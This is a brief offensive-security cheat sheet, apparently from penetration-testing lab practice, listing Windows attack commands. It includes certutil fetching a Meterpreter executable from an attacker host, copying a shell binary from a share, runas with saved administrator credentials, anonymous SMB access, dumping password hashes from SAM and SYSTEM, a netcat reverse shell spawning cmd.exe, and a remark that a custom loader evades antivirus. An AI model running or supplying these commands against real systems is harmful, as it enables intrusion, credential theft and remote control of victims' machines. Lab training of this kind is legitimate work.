Downloading files

certutil -urlcache -split -f http://10.10.14.44:8181/msf.exe msf.exe

expand \\10.11.0.115\test\shell.exe shell.exe

Running commands as different user

runas /savecred /user:access\administrator “cmd /C DEL c:\temp\test.txt”

Samba

  • Connect without credentials

smbclient.py " / @10.10.10.134"

Dump credentials from SAM and SYSTEM

samdump2 SYSTEM SAM

Netcat reverse if you can upload it

nc -nv 10.10.12.105 9191 -e cmd.exe

Bypass AV by spoofing signature

Carbon copy no longer works it seems. Custom loader works.

https://astr0baby.wordpress.com/2019/01/26/custom-meterpreter-loader-in-2019/

privesc cheat sheet

https://www.fuzzysecurity.com/tutorials/16.html